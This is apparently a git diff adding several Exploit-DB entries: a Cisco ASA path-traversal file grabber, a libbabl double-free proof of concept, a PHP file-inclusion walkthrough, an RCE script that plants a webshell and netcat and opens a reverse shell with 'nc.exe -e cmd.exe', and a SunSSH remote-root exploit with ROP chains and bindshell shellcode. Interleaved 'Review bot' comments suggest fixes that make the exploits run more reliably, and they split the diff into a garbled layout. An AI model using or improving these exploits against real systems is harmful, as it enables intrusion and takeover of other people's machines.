diff --git a/exploits/hardware/webapps/49262.py b/exploits/hardware/webapps/49262.py
new file mode 100755
index 000000000..3ae7ad1f6
--- /dev/null
+++ b/exploits/hardware/webapps/49262.py
@@ -0,0 +1,113 @@
+# Exploit Title: Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2)
+# Date: 12 Dec 2020
+# Exploit Author: Freakyclown@cygenta.co.uk
+# Vendor Homepage: cisco.com
+# Software Link: It’s against Hardware, specifically ASA’s and FTD’s
+# Version: ASAs (from version 9.6 to 9.14.1.10) and FTD’s (versions 6.2.3 to 6.6.0.1)
+# Tested on: exploit runs on Python3 on OSX and on Kali Linux against cisco ASA 9.14
+# CVE : CVE-2020-3452
+# Github : https://github.com/cygenta/CVE-2020-3452
+
+import requests
+
+# Written by freakyclown for @CygentaHQ
+# Cisco ASA Path Traversal
+# CVE-2020-3452
+# Usage: CVE-2020-3452.py {target}"
+# Example: CVE-2020-3452.py 192.168.0.12"
+# Requires - Requests - pip3 install requests
+#
+# This tool takes advantage of the above cve and attempts to
+# download files as listed below, it is suggested that you make
+# a working folder for the outputfiles to avoid confusion if
+# attacking mutliple ASA's
+
+# set your target
+target = input("Enter target IP/Url: ")
+
+
+def grabstuff():
+ for file in files:
+ print("trying: ", file)
+
+ #set request parameters
+ params = (
+ ('type', 'mst'),
+ ('textdomain', '+CSCOE+/'+file),
+ ('default-language', ''),
+ ('lang', '../'),
+ )
+
+ # set the response to the result of the request, inputting in target and params and ignoring ssl cert problems
+ response = requests.get('https://'+target+'/+CSCOT+/translation-table', params=params, verify=False)
+ # write the file to the disk
+ f = open(file,"w")
+ f.write(response.text)
+ f.close()
+
+
+
+# this is a list of files available to download, more will be added in time
+# if anyone has a list of ASA files, I'd be happy to add here
+files = {
+"sess_update.html",
+"blank.html",
+"noportal.html",
+"portal_ce.html",
+"portal.html",
+"logon_custom.css",
+"svc.html",
+"logo.gif",
+"portal_inc.lua",
+"nostcaccess.html",
+"session.js",
+"portal.js",
+"portal_custom.css",
+"running.conf",
+"tlbrportal_forms.js",
+"logon_forms.js",
+"win.js",
+"portal.css",
+"lced.html",
+"pluginlib.js",
+"useralert.html",
+"ping.html",
+"app_index.html",
+"shshimdo_url",
+"session_password.html",
+"relayjar.html",
+"relayocx.html",
+"color_picker.js",
+"color_picker.html",
+"cedhelp.html",
+"cedmain.html",
+"cedlogon.html",
+"cedportal.html",
+"portal_elements.html",
+"commonspawn.js",
+"common.js",
+"appstart.js",
+"relaymonjar.html",
+"relaymonocx.html",
+"cedsave.html",
+"tunnel_linux.jnlp",
+"ask.html",
+"no_svc.html",
+"preview.html",
+"cedf.html",
+"ced.html",
+"logon_redirect.html",
+"logout.html",
+"tunnel_mac.jnlp",
+"gp-gip.html",
+"auth.html",
+"wrong_url.html",
+"logon.html"}
+
+
+# obvious thing is obvious, try the things and barf if fail
+try:
+ grabstuff()
+except Exception as err:
+ print("Something went wrong sorry")
+ print(err)
\ No newline at end of file
diff --git a/exploits/linux/local/49259.c b/exploits/linux/local/49259.c
new file mode 100644
index 000000000..524a43d2c
--- /dev/null
+++ b/exploits/linux/local/49259.c
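Review bot: In `grabstuff` every response is written to disk unconditionally at `f = open(file,"w")` / `f.write(response.text)`, so a 404 or a login page from a non-vulnerable target is saved under the requested name as if the download had worked, and text mode re-encodes binary entries such as `logo.gif`. Guard the write with `if response.status_code != 200: continue` and replace the open/write/close trio with `with open(file, "wb") as f: f.write(response.content)` so the handle is closed even when the write fails and bytes are preserved verbatim. With `verify=False` every request also emits an `InsecureRequestWarning`; a single `requests.packages.urllib3.disable_warnings()` after the import keeps the per-file output readable. Note that `files` is a set literal, so the download order differs from run to run; a list would make the output reproducible.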
@@ -0,0 +1,57 @@
+# Exploit Title: libbabl 0.1.62 - Broken Double Free Detection (PoC)
+# Date: December 14, 2020
+# Exploit Author: Carter Yagemann
+# Vendor Homepage: https://www.gegl.org
+# Software Link: https://www.gegl.org/babl/
+# Version: libbabl 0.1.62 and newer
+# Tested on: Debian Buster (Linux 4.19.0-9-amd64)
+# Compile: gcc -Ibabl-0.1 -lbabl-0.1 babl-0.1.62_babl_free.c
+
+/*
+ * Babl has an interesting way of managing buffers allocated and freed using babl_malloc()
+ * and babl_free(). This is the structure of its allocations (taken from babl-memory.c):
+ *
+ * typedef struct
+ * {
+ * char *signature;
+ * size_t size;
+ * int (*destructor)(void *ptr);
+ * } BablAllocInfo;
+ *
+ *
+ * signature is used to track whether a chunk was allocated by babl, and if so, whether
+ * it is currently allocated or freed. This is done by either pointing it to the global
+ * string "babl-memory" or "So long and thanks for all the fish." (babl-memory.c:44).
+ *
+ * Using this signature, babl can detect bad behavior's like double free (babl-memory.c:173):
+ *
+ * void
+ * babl_free (void *ptr,
+ * ...)
+ * {
+ * ...
+ * if (freed == BAI (ptr)->signature)
+ * fprintf (stderr, "\nbabl:double free detected\n");
+ *
+ *
+ * Or so the developers think. As it turns out, because babl internally uses libc's malloc()
+ * and free(), which has its own data that it stores within freed chunks, most systems will
+ * overwrite babl's signature variable upon freeing, breaking the double free detection.
+ * The simple PoC below demonstrates this:
+ */
+
+#include
+#include
+#include
+
+#include
+
+int main(int argc, char **argv) {
+ void *buf = babl_malloc(42);
+ babl_free(buf);
+ // BUG: reports an "unknown" pointer warning when the following is clea=
+rly a double free
+ babl_free(buf);
+
+ return 0;
+}
\ No newline at end of file
diff --git a/exploits/php/webapps/49258.txt b/exploits/php/webapps/49258.txt
new file mode 100644
index 000000000..e61a6f1c1
--- /dev/null
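Review bot: As committed this file will not build with the `Compile:` command it advertises: the Exploit-DB header lines from `# Exploit Title:` to `# Compile:` are read by the C preprocessor as directives (`# Exploit` is an invalid directive), and the quoted-printable soft break that split the comment into `clea=` and a following line `rly a double free` leaves that second fragment outside any comment as a bare syntax error. Wrap the eight header lines in `/* ... */` and rejoin the comment as `// BUG: reports an "unknown" pointer warning when the following is clearly a double free`. The four `#include` lines render empty here, presumably because the angle-bracketed header names were stripped on the way into the corpus; worth confirming that `<babl/babl.h>` and the libc headers survive in the actual file. Putting `-lbabl-0.1` before the source file can also fail to link on toolchains that default to `--as-needed`, so the source should come first in the compile line.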
+++ b/exploits/php/webapps/49258.txt
@@ -0,0 +1,26 @@
+# Exploit Title: Task Management System 1.0 - 'page' Local File Inclusion
+# Exploit Author: İsmail BOZKURT
+# Date: 2020-12-15
+# Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code
+# Affected Version: Version 1
+# Category: Web Application
+# Tested on: Windows 10 x86_64
+
+Step 1. Log into application with credentials
+Step 2. Click on Branch
+Step 3. Select New Branch http://127.0.0.1/index.php?page=index
+Step 4. change index to ../../../c:/xampp/apache/bin/php.ini%00
+
+Note: php version < 5.3.3
+
+section class="content">
+
+
\ No newline at end of file
diff --git a/exploits/php/webapps/49260.py b/exploits/php/webapps/49260.py
new file mode 100755
index 000000000..1d2d8b55c
--- /dev/null
+++ b/exploits/php/webapps/49260.py
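Review bot: The prerequisite `Note: php version < 5.3.3` understates the affected range and hides why it matters: null-byte truncation of filesystem paths (the `%00` in Step 4) was removed in PHP 5.3.4, so the condition should read `Note: php version < 5.3.4 (the %00 relies on null-byte path truncation, removed in 5.3.4)`. The steps should also state what the null byte is cutting off — presumably a fixed suffix such as `.php` that `index.php` appends to the `page` parameter before including it, though the application code is not visible here and that should be confirmed. The traversal `../../../c:/xampp/apache/bin/php.ini` only demonstrates the issue on a XAMPP-on-Windows install; a second example with a Linux path would make the LFI claim reproducible elsewhere. The trailing `section class="content">` fragment looks like a truncated copy of the response and, as shown, evidences nothing.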
@@ -0,0 +1,128 @@
+# Exploit Title: Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (Authenticated)
+# Google Dork: N/A
+# Date: 2020-14-12
+# Exploit Author: Andrea Bruschi - www.andreabruschi.net
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/
+# Version: 1.0
+# Tested on: Windows 10 / Xampp Server and Wamp Server
+
+#!/usr/bin/python3
+
+import requests
+import sys
+import os
+import iterm2
+import AppKit
+
+url = sys.argv[1]
+mobile = sys.argv[2]
+password = sys.argv[3]
+
+# CONFIGURE HERE
+reverse_ip = '192.168.xx.xx'
+reverse_port = 4444
+
+# CONFIGURE HERE
+# SCRIPT WILL DOWNLOAD NETCAT AND A WEBSHELL
+netcat_path = '/local/path/to/nc.exe'
+shell_path = '/local/path/to/shell.php'
+
+
+def login(url, mobile, password):
+
+ url = "{}/user/login.php".format(url)
+ payload = {'mobno':mobile, 'password':password, 'login':''}
+ req = requests.post(url, data=payload)
+ cookie = req.cookies['PHPSESSID']
+
+ return cookie
+
+
+def upload(url, cookie, file=None):
+
+ f = open(file, 'rb')
+ filename, ext = os.path.splitext(file)
+
+ if "exe" in ext:
+ content_type = 'application/octet-stream'
+ else:
+ content_type = 'application/x-php'
+
+ cookie = {'PHPSESSID':cookie}
+ url = "{}/user/marriage-reg-form.php".format(url)
+
+ files = {'husimage': (filename + ext, f, content_type, {'Expires': '0'}), 'wifeimage':('test.jpg','','image/jpeg')}
+ payload = {'dom':'05/01/2020','nofhusband':'test', 'hreligion':'test', 'hdob':'05/01/2020','hsbmarriage':'Bachelor','haddress':'test','hzipcode':'test','hstate':'test','hadharno':'test','nofwife':'test','wreligion':'test','wsbmarriage':'Bachelor','waddress':'test','wzipcode':'test','wstate':'test','wadharno':'test','witnessnamef':'test','waddressfirst':'test','witnessnames':'test','waddresssec':'test','witnessnamet':'test','waddressthird':'test','submit':''}
+ req = requests.post(url, data=payload, cookies=cookie, 
files=files)
+ print(f'[+] File {ext} uploaded')
+
+
+def get_remote_file(url, ext):
+
+ url = "{}/user/images".format(url)
+ req = requests.get(url)
+ junk = req.text.split(ext)[0]
+ f = junk[-42:] + ext
+
+ return f
+
+
+def persistence(url, webshell, netcat):
+
+ # webshell
+ payload_w = "copy /y {} shell.php".format(webshell)
+ url_w = "{}/user/images/{}?cmd={}".format(url, webshell, payload_w)
+ req_w = requests.get(url_w)
+
+ # netcat
+ payload_n = "copy /y {} nc.exe".format(netcat)
+ url_n = "{}/user/images/{}?cmd={}".format(url, webshell, payload_n)
+ req_n= requests.get(url_n)
+
+ print('[+] Persistence enabled')
+
+
+def get_reverse(url, ip, port):
+
+ payload = "nc.exe -nv {} {} -e cmd.exe".format(ip, port)
+ url_r = "{}/user/images/shell.php?cmd={}".format(url, payload)
+ print('[+] Reverse shell incoming!')
+ req = requests.get(url_r)
+
+
+# CONFIGURE HERE
+# THE SCRIPT WILL LAUNCH iTerm2 WINDOW RUNNING NC LISTENER
+# YOU CAN ALSO COMMENT THE CALL TO THIS FUNCTION BELOW AND START NC MANUALLY
+def start_listener(port):
+
+ # Launch the app
+ AppKit.NSWorkspace.sharedWorkspace().launchApplication_("iTerm2")
+
+ async def main(connection):
+ app = await iterm2.async_get_app(connection)
+ window = app.current_window
+ if window is not None:
+ cmd = "nc -lnv {}".format(port)
+ await window.async_create_tab(command=cmd)
+ else:
+ print("No current window")
+
+ iterm2.run_until_complete(main)
+
+
+
+if __name__ == "__main__":
+
+ if len(sys.argv < 3):
+ print("Usage: exploit.py ")
+ else:
+ cookie = login(url, mobile, password)
+ upload(url, cookie, netcat_path)
+ upload(url, cookie, shell_path)
+ webshell = get_remote_file(url, '.php')
+ netcat = get_remote_file(url, '.exe')
+ persistence(url, webshell, netcat)
+
+ start_listener(reverse_port)
+ get_reverse(url, reverse_ip, reverse_port)
\ No newline at end of file
diff --git a/exploits/solaris/remote/49261.c b/exploits/solaris/remote/49261.c
new file mode 100644
index 000000000..404c67bbe
--- /dev/null
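Review bot: The argument check in the `__main__` block is broken: `if len(sys.argv < 3):` compares a list with an int and raises `TypeError`, and it only runs after `url = sys.argv[1]`, `mobile = sys.argv[2]` and `password = sys.argv[3]` have already indexed argv at module top, so a missing argument dies with `IndexError` before the usage text is ever printed. The guard should be `if len(sys.argv) < 4:` (three positional arguments plus the script name), exit non-zero, and the three assignments should move under it. `import iterm2` and `import AppKit` are unconditional, so the script cannot start on a non-macOS host even though the comment above `start_listener` presents the listener as optional; importing them inside `start_listener` keeps the rest usable. `get_remote_file` also fetches `/user/images` without the session cookie and slices `junk[-42:]` out of the directory listing, which silently returns garbage if listing is disabled or the server-side name length differs — hedged, since the upload naming code is not visible here.
```python
if __name__ == "__main__":

    if len(sys.argv) < 4:
        print("Usage: exploit.py <url> <mobile> <password>")
        sys.exit(1)
    url, mobile, password = sys.argv[1], sys.argv[2], sys.argv[3]
    # … unchanged: login, uploads, persistence, listener, reverse shell …
```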
+++ b/exploits/solaris/remote/49261.c 
@@ -0,0 +1,592 @@ +# Exploit Title: Solaris SunSSH 11.0 x86 - libpam Remote Root +# Exploit Author: Hacker Fantastic +# Vendor Homepage: https://www.oracle.com/solaris/technologies/solaris11-overview.html +# Version: 11 +# Tested on: SunOS solaris 5.11 11.0 + +/* SunSSH Solaris 10-11.0 x86 libpam remote root exploit CVE-2020-14871 + * ==================================================================== + * Makefile + * all: hfsunsshdx + * + * hfsunsshdx: main.c + * gcc main.c -o hfsunsshdx -lssh2 + * + * clean: + * rm -rf hfsunsshdx + * rm -rf core.* + * + * A trivial to reach stack-based buffer overflow is present in libpam on + * Solaris. The vulnerable code exists in pam_framework.c parse_user_name() + * which allocates a fixed size buffer of 512 bytes on the stack and parses + * usernames into the buffer via modules (authtok_get) without bounds checks. + * This issue can be reached remotely pre-authentication via SunSSH when + * "keyboard-interactive" is enabled to use PAM based authentication. The + * vulnerability was discovered being actively exploited by FireEye in the + * wild and is part of an APT toolkit called "EVILSUN". The vulnerability + * is present in both SPARC/x86 versions of Solaris & others (eg. illumos). + * This exploit uses ROP gadgets to disable nxstack through mprotect on x86 + * and a helper shellcode stub. The configuration in a default Solaris + * install is vulnerable. The exploit makes use of libssh2 and tested on + * Solaris 10 through 11.0. Solaris 9 does not ship with a vulnerable + * SunSSH implementation and versions later than 11.1 have updated SunSSH + * code that prevents the issue being triggered. + * + * e.g. 
+ * ./hfsunsshdx -s 192.168.11.220 -t 0 -x 2 + * [+] SunSSH Solaris 10-11.0 x86 libpam remote root exploit CVE-2020-14871 + * [-] chosen target 'Solaris 11 11/11 11.0 Sun_SSH_2.0 x86' + * [-] using shellcode 'Solaris 11.0 x86 bindshell tcp port 9999' 193 bytes + * [+] ssh host fingerprint: 01bc34fe8092e051716b91fd88eed210db2df49e + * [+] entering keyboard-interactive authentication. + * [-] number of prompts: 1 + * [-] prompt 0 from server: 'Please enter user name: ' + * [-] shellcode length 193 bytes + * [-] rop chain length 68 + * [-] exploit buffer length 580 + * [-] sending exploit magic buffer... wait + * [+] exploit success, handling payload... + * [-] connected.. enjoy :) + * SunOS solaris 5.11 11.0 i86pc i386 i86pc + * 6:49pm up 53 min(s), 1 user, load average: 0.01, 0.01, 0.01 + * helpdesk console Nov 27 17:57 + * uid=0(root) gid=0(root) + * + * -- Hacker Fantastic (https://hacker.house) + */ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +int sd = -1; +int oldsd = -1; +int ishell = -1; +char* buf; +char* payload; +char* retaddr; +struct sockaddr_in sain; + +struct target { + char* name; + char* ropchain; +}; + +struct shellcode { + char* name; + char* shellcode; +}; + +void spawn_shell(int); +void bindshell_setup(short); +void on_alarm(int); +void on_interupt(int); +void prepare_payload(); + +const int targetno = 5; +struct target targets[] = { + {"Solaris 11 11/11 11.0 Sun_SSH_2.0 x86", + "\x41\x42\x43\x44" // %ebx + "\x45\x46\x47\x48" // %esi + "\x50\x51\x52\x53" // %ebp + "\xa7\x0e\x06\x08" // pop %ecx, pop %edx, pop %ebp + "\x9c\x3e\x04\x08" // ptr to (0x?, 0x?, 0x8044cf0, 0x7) + "\x01\x01\x04\x08" // %edx unused, must be writeable addr + "\x41\x42\x43\x44" // %ebp unused var + "\x93\xdb\xc8\xfe" // pop %edx ; ret + "\x01\x30\x04\x08" // ptr to 0x08043001 mprotect arg + "\x1a\xe7\x0b\xfe" // dec %edx ; ret + "\x79\x41\xfe\xfe" // mov 
%edx,$0x4(%ecx) ; xor %eax, %eax ; ret + "\x93\xdb\xc8\xfe" // pop %edx ; ret + "\x01\x30\x04\x08" // ptr to shellcode + "\xe0\xe8\x3e\xfe" // mov $0x72,%al + "\x64\x7c\xc3\xfe" // inc %eax ; ret + "\x64\x7c\xc3\xfe" // inc %eax ; ret + "\x22\x9d\xd3\xfe"},// sysenter + {"Solaris 11 Express (snv_151a) Sun_SSH_1.5 x86", + "\x41\x42\x43\x44" // %ebx overwrite unused + "\x41\x42\x43\x44" // %esi overwrite unused + "\xf8\x32\x04\x08" // %ebp overwrite unused + "\xb7\xf9\x05\x08" // pop %ecx ; pop %edx ; pop %ebp ; ret + "\x7e\x36\x02\x04" // ptr/2 to (0x?, 0x0, 0x1000, 0x7) + "\x01\x30\x04\x08" // ptr for %edx + "\x44\x43\x42\x41" // ptr for %ebp unused + "\xe4\xd4\xde\xfe" // dec %edx ; add %ecx, %ecx ; ret + "\x19\x42\xfe\xfe" // mov %edx,$0x4(%ecx) ; xor %eax, %eax; ret + "\xb8\xf9\x05\x08" // pop %edx ; pop %ebp ; ret + "\xeb\x30\x04\x08" // shellcode ptr for %edx + "\x1c\x33\x04\x08" // %ebp & used by "leave" + "\x84\x98\x51\xfe" // mov $0x82, %eax ; pop %esi ; pop %ebx ; leave ; ret + "\x41\x42\x43\x44" // %esi unused + "\xe0\x30\x04\x08" // shellcode ptr to %ebx + "\xe8\x32\x04\x08" // ptr into %ebp + "\x19\x3f\xfe\xfe" // sub $0x4,%eax ; ret + "\x19\x3f\xfe\xfe" // sub $0x4,%eax ; ret + "\x19\x3f\xfe\xfe" // sub $0x4,%eax ; ret + "\x11\x3f\xfe\xfe" // sub $0x2,%eax ; ret + "\xfe\xf8\xcf\xfe"},// sysenter + {"Solaris 10 1/13 (147148-26) Sun_SSH_1.1.5 x86", + "\xc3\x31\x04\x08" // overwrite %ebp unused + "\xa3\x6c\xd8\xfe" // mov $0x74, %eax ; ret + "\x29\x28\x07\x08" // pop %ebx ; ret + "\xf0\xff\xaf\xfe" // 0x0a writen to address, unused gadget + "\x08\xba\x05\x08" // pop %edx ; pop %ebp ; ret + "\x01\x30\x04\x08" // %edx pointer to page + "\xb8\x31\x04\x08" // unused %ebp value + "\xaa\x4c\x68\xfe" // pop %ecx ; ret + "\xe0\x6e\x04\x08" // ptr (0x?,0x0,0x1000,0x7) + "\x61\x22\x07\x08" // dec %edx ; ret + "\x8b\x2d\xfe\xfe" // mov %edx,0x4(%ecx) ; xor %eax,%eax ; ret + "\xa3\x6c\xd8\xfe" // mov $0x74, %eax ; ret + "\x08\xba\x05\x08" // pop %edx ; pop %ebp ; ret 
+ "\xc3\x31\x04\x08" // shellcode addr for %edx + "\xc3\x31\x04\x08" // unused %ebp value + "\xf6\x0d\xf4\xfe"},// sysenter, (ret into shellcode via %edx) + {"Solaris 10 8/11 (147441-01) Sun_SSH_1.1.4 x86", + "\xc3\x31\x04\x08" // overwrite %ebp unused + "\x73\x6a\xd7\xfe" // mov $0x74, %eax ; ret + "\xb1\x26\x07\x08" // pop %ebx ; ret + "\xff\x01\xac\xfe" // write garbage here, unused gadget + "\x98\xb9\x05\x08" // pop %edx ; pop %ebp ; ret + "\xff\x2f\x04\x08" // %edx pointer to page + "\xc3\x31\x04\x08" // unused %ebp value + "\x57\xaa\xe4\xfe" // pop %ecx ; ret + "\x94\x11\x5f\xfe" // ptr rwx (0x?,0x04b,0xe50,0x7) + "\xee\x6a\x65\xfe" // inc %edx ; ret + "\x9b\xc5\xc1\xfe" // mov %edx,0x4($ecx) ; xor %eax,%eax ; ret + "\x73\x6a\xd7\xfe" // mov $0x74, %eax ; ret + "\x86\xae\xe5\xfe" // pop %edx ; ret + "\xc3\x31\x04\x08" // shellcode return address for %edx + "\x66\x56\xb9\xfe"},// sysenter (ret into shellcode via %edx) + {"Solaris all Sun_SSH_1.x.x debug crash target", + "\x41\x42\x43\x43" // %ebp ptr + "\x78\x79\x80\x81"} // %eip ptr +}; + +const int shellno = 4; + +struct shellcode shellcodes[] = { + {"Solaris x86 bindshell tcp port 9999", + /* mprotect magic stub necessary for payloads expecting +x stack */ + "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" + "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x31\xc9" + "\xbb\x01\x10\x04\x08\x66\xb8\x01\x70\xb1\x07\x4b\x48\x51\x50" + "\x53\x53\x89\xe1\x31\xc0\xb0\x74\xcd\x91" + /* mprotect_shellcode.S Solaris x86 mprotect(0x08044000,0x7000,0x07); + ================================================================== + xorl %eax, %eax + xorl %ecx, %ecx + movl $0x08041001, %ebx + movw $0x7001, %ax + movb $0x7,%cl + dec %ebx + dec %eax + pushl %ecx + pushl %eax + pushl %ebx + pushl %ebx + movl %esp, %ecx + xorl %eax, %eax + movb $0x74, %al + int $0x91 + */ + /* msfvenom -p solaris/x86/shell_bind_tcp -b "\x09\x20" LPORT=9999 -f c -e x86/xor_dynamic */ + 
"\xeb\x23\x5b\x89\xdf\xb0\x55\xfc\xae\x75\xfd\x89\xf9\x89\xde" + "\x8a\x06\x30\x07\x47\x66\x81\x3f\x2a\x95\x74\x08\x46\x80\x3e" + "\x55\x75\xee\xeb\xea\xff\xe1\xe8\xd8\xff\xff\xff\x01\x55\x69" + "\xfe\xd9\xfe\x3d\x6b\x64\x88\xe7\xf6\x57\x05\xf7\x17\x30\xc1" + "\x51\x69\xfe\x03\x26\x0e\x88\xe6\x6b\x03\x51\x51\x6b\x03\x6b" + "\x03\xb1\xe7\xfe\xd7\x6b\x11\x56\x51\x30\xc1\xb1\xe9\xfe\xd7" + "\x5a\x51\x51\x52\xb1\xe8\xfe\xd7\xb1\xeb\xfe\xd7\x6b\x08\x51" + "\x6b\x3f\x59\xfe\xd7\xfe\x4e\xd9\x78\xf7\x51\x69\x2e\x2e\x72" + "\x69\x69\x2e\x63\x68\x6f\x88\xe2\x51\x52\x88\xe0\x51\x50\x52" + "\xb1\x3a\xfe\xd7\x2a\x95"}, + {"Solaris x86 bindshell tcp port 8080", + /* mprotect magic stub necessary for payloads expecting +x stack */ + "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" + "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x31\xc9" + "\xbb\x01\x10\x04\x08\x66\xb8\x01\x70\xb1\x07\x4b\x48\x51\x50" + "\x53\x53\x89\xe1\x31\xc0\xb0\x74\xcd\x91" + /* msfvenom -p solaris/x86/shell_bind_tcp -b "\x09\x20" LPORT=8080 -f c -e x86/xor_dynamic */ + "\xeb\x23\x5b\x89\xdf\xb0\x9a\xfc\xae\x75\xfd\x89\xf9\x89\xde" + "\x8a\x06\x30\x07\x47\x66\x81\x3f\x44\x60\x74\x08\x46\x80\x3e" + "\x9a\x75\xee\xeb\xea\xff\xe1\xe8\xd8\xff\xff\xff\x01\x9a\x69" + "\xfe\xd9\xfe\x3d\x6b\x64\x88\xe7\xf6\x57\x05\xf7\x17\x30\xc1" + "\x51\x69\xfe\x03\x1e\x91\x88\xe6\x6b\x03\x51\x51\x6b\x03\x6b" + "\x03\xb1\xe7\xfe\xd7\x6b\x11\x56\x51\x30\xc1\xb1\xe9\xfe\xd7" + "\x5a\x51\x51\x52\xb1\xe8\xfe\xd7\xb1\xeb\xfe\xd7\x6b\x08\x51" + "\x6b\x3f\x59\xfe\xd7\xfe\x4e\xd9\x78\xf7\x51\x69\x2e\x2e\x72" + "\x69\x69\x2e\x63\x68\x6f\x88\xe2\x51\x52\x88\xe0\x51\x50\x52" + "\xb1\x3a\xfe\xd7\x44\x60"}, + /* dup2(); and execve(); changed calling convention on 11.0, uses x86/shikata_ga_nai */ + {"Solaris 11.0 x86 bindshell tcp port 9999", + "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" + "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" + 
"\x31\xc0\x31\xc9\x31\xd2\xbb\x01\x10\x04\x08\x66\xb8\x01\x70" + "\xb1\x07\x66\xba\x01\x10\x66\x31\xd3\x48\x51\x50\x53\x53\x89" + "\xe1\x31\xc0\xb0\x74\xcd\x91"//not encoded, stack address different + "\xb8\x5d\x6d\x26\x15\xda\xce\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1" + "\x19\x31\x42\x15\x83\xea\xfc\x03\x42\x11\xe2\xa8\x05\xd9\xcd" + "\xad\xea\x4f\x8b\xd8\xf5\x67\x05\xde\x0f\x91\x9b\x1e\xbf\xf6" + "\x24\x9c\x67\x08\x52\x47\x0d\x14\x34\xd7\xb8\x1a\xde\xd5\x8c" + "\xfd\xe1\x0f\x86\x11\x49\xff\x66\xd2\xc5\x17\x77\x04\x7e\xb7" + "\xdb\x19\x68\xc8\x0a\xe9\x81\xc9\x65\x60\x5f\x5f\x83\x25\x35" + "\xa1\xcb\x3a\x1f\x22\xa4\x1c\xd9\x2a\x0a\x5d\x4a\xba\x42\x72" + "\x18\x52\xf5\xa3\xbc\xcb\x6b\x35\xa3\x5b\x27\xcc\xc5\x0b\x97" + "\x9f\x56\x1b\x2c\xdf\x8f"}, + /* dup2(); and execve(); changed calling convention on 11.0, uses x86/shikata_ga_nai */ + {"Solaris 11.0 x86 bindshell tcp port 4444", + "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" + "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" + "\x31\xc0\x31\xc9\x31\xd2\xbb\x01\x10\x04\x08\x66\xb8\x01\x70" + "\xb1\x07\x66\xba\x01\x10\x66\x31\xd3\x48\x51\x50\x53\x53\x89" + "\xe1\x31\xc0\xb0\x74\xcd\x91"//not encoded, stack address different + "\xb8\x8d\x2e\x32\x79\xd9\xe5\xd9\x74\x24\xf4\x5b\x29\xc9\xb1" + "\x19\x31\x43\x15\x03\x43\x15\x83\xc3\x04\xe2\x78\x46\xcd\xa1" + "\x7d\xab\x5b\x37\x08\x32\x6c\xe1\x0e\x4d\x85\x3f\xce\xe1\xc2" + "\xc0\xcc\x1e\x83\xb6\x37\x4a\xa1\x98\xe7\xe1\xa7\x72\x05\x46" + "\x41\x7d\xdf\xcc\x9e\xd5\x8f\x21\x5f\x69\xc7\xbd\x89\xd1\x47" + "\x11\x86\x0f\x98\x43\x56\x25\x99\xba\xfd\xb3\x0f\x4a\x52\xae" + "\xf1\x14\xad\xf8\xf2\xea\x89\x7c\xfa\xc4\xe9\x2f\x6a\x08\xc5" + "\xbc\x02\x3e\x36\x21\xbb\xd0\xc1\x46\x6b\x7e\x5b\x69\xdb\xd0" + "\x0a\x39\x6b\xeb\x53\x6b"} +}; + +void spawn_shell(int sd) { +#define sockbuflen 2048 + int rcv; + char sockbuf[sockbuflen]; + fd_set readfds; + memset(sockbuf,0,sockbuflen); + snprintf(sockbuf,sockbuflen,"uname -a;uptime;who;id\n"); + 
write(sd,sockbuf,strlen(sockbuf)); + while (1) { + FD_ZERO(&readfds); + FD_SET(0,&readfds); + FD_SET(sd,&readfds); + select(255,&readfds,NULL,NULL,NULL); + if (FD_ISSET(sd, &readfds)) { + memset(sockbuf,0,sockbuflen); + rcv = read(sd,sockbuf,sockbuflen); + if (rcv <= 0) { + printf("\e[1m\e[34m[!] connection closed by foreign host.\n\e[0m"); + exit(-1); + } + printf("%s",sockbuf); + fflush(stdout); + } + if(FD_ISSET(0,&readfds)) { + memset(sockbuf,0,sockbuflen); + read(0,sockbuf,sockbuflen); + write(sd,sockbuf,strlen(sockbuf)); + } + } +} + +void bindshell_setup(short port){ + oldsd = sd; + sd = socket(AF_INET,SOCK_STREAM,0); + sain.sin_port = htons(port); + if(connect(sd,(struct sockaddr*)&sain,sizeof(sain))<0){ + printf("[!] fatal bind shell failed\n\e[0m"); + exit(-1); + } + printf("[-] connected.. enjoy :)\e[0m\n"); + spawn_shell(sd); +} + +void on_alarm(int signum){ + printf("[+] exploit success, handling payload...\n"); + if(ishell==0||ishell==2){ + bindshell_setup(9999); + } + if(ishell==1||ishell==3){ + bindshell_setup(8080); + } + printf("[-] exploit complete\n\e[0m"); + exit(0); +} + +void on_interrupt(int signum){ + printf("\e[1m\e[34m[!] interrupt caught... cleaning up\n\e[0m"); + if(sd){ + close(sd); + } + if(oldsd){ + close(oldsd); + } + exit(0); +} + +void prepare_payload(){ /* bad characters are 0x20 0x09 & 0x00 */ +#define payload_size 4096 + int len = strlen(payload); + buf = malloc(payload_size); + char randchar = 'A'; + char* randbuf = malloc(2); + if(!buf||!randbuf){ + printf("[!] 
